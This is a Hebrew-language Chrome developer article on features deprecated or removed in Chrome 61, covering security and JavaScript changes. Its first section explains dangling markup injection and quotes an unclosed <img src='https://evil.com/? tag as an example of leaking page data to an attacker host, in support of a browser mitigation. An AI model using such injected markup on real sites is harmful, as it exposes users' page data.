הוצאה משימוש והסרות ב-Chrome 61

Joe Medley
Joe Medley
GitHub

כמעט בכל גרסה של Chrome אנחנו מוסיפים מספר רב של עדכונים ושיפורים למוצר, לביצועים שלו וליכולות של פלטפורמת האינטרנט. במאמר הזה מתוארים הפריטים שהוצאו משימוש והפריטים שהוסרו ב-Chrome 61, שנמצא בגרסת בטא החל מ-3 באוגוסט. הרשימה הזו עשויה להשתנות בכל שלב.

אבטחה ופרטיות

חסימת משאבים שכתובות ה-URL שלהם מכילות את התווים '\n' ו-'<'

יש סוג של פריצה שנקרא החדרת תגי עיצוב תלויים, שבו נעשה שימוש בכתובת URL חתוכה כדי לשלוח נתונים לנקודת קצה חיצונית. לדוגמה, נניח שיש דף שמכיל את <img src='https://evil.com/?. מכיוון שכתובת ה-URL לא כוללת גרש סגירה, הדפדפנים ימשיכו לקרוא עד לגרש הבא שיופיע ויתייחסו לתוים שמקובצים בתו הסוגר כאילו מדובר בכתובת URL אחת.

בגרסה 61 של Chrome, נקודת החולשה הזו מופחתת על ידי הגבלת קבוצות התווים שמותר להשתמש בהן במאפיינים href ו-src. באופן ספציפי, Chrome יפסיק לעבד כתובות URL כשהוא נתקל בתווים של שורה חדשה (\n) ובתווים של פחות מ- (<).

מפתחים שיש להם תרחיש לדוגמה לגיטימי לשימוש במעבר שורה ובפחות תווים בכתובת URL צריכים להשתמש במקום זאת בהימלטות מהתווים האלה.

כוונה להסרה | מעקב אחרי סטטוס Chrome | באג ב-Chromium

הוצאה משימוש והסרה של Presentation API בהקשרים לא מאובטחים

נמצא שבמקורות לא מאובטחים, אפשר להשתמש ב-Presentation API כוקטור לפריצה. מכיוון שלמסכים אין סרגל כתובות, אפשר להשתמש ב-API כדי לזייף תוכן. אפשר גם לחלץ נתונים מהצגה פעילה.

בהתאם לכוונה של Blink להסיר תכונות חזקות ממקורות לא מאובטחים, אנחנו מתכננים להוציא משימוש את התמיכה ב-Presentation API ולהסיר אותה מהקשרים לא מאובטחים. החל מגרסה 61 של Chrome, האפשרות PresentationRequest.start() לא תפעל יותר במקורות לא מאובטחים.

כוונה להסרה | מעקב אחרי סטטוס Chrome | באג ב-Chromium

JavaScript

איסור הגדרת נכסים שנוספו לאינדקס בחלונות

בעבר, דפדפנים מסוימים איפשרו הקצאות של JavaScript כמו:

    window[0] = 1;

במפרט הנוכחי של HTML מצוין שזו הפרה מפורשת של מפרט JavaScript. לכן, היכולת הזו הוסרה ב-Chrome 61. החל מפברואר 2016, דפדפן Firefox כבר עומד בדרישות.

באג ב-Chromium

הסרת השימוש בהתראות מ-iframes לא מאובטחים

בקשות הרשאה מ-iframes עלולות לבלבל משתמשים, כי קשה להבחין בין המקור של הדף שמכיל את ה-iframe לבין המקור של ה-iframe ששולח את הבקשה. כשהיקף הבקשות לא ברור, קשה למשתמשים להחליט אם להעניק או לדחות את ההרשאה.

איסור ההתראות ב-iframes יעזור גם להתאים את הדרישות להרשאת התראות לדרישות של התראות דחיפה, וכך להקל על המפתחים.

מפתחים שזקוקים לפונקציונליות הזו יכולים לפתוח חלון חדש כדי לבקש הרשאה לקבלת התראות.

כוונה להסרה | מעקב אחרי סטטוס Chrome | באג ב-Chromium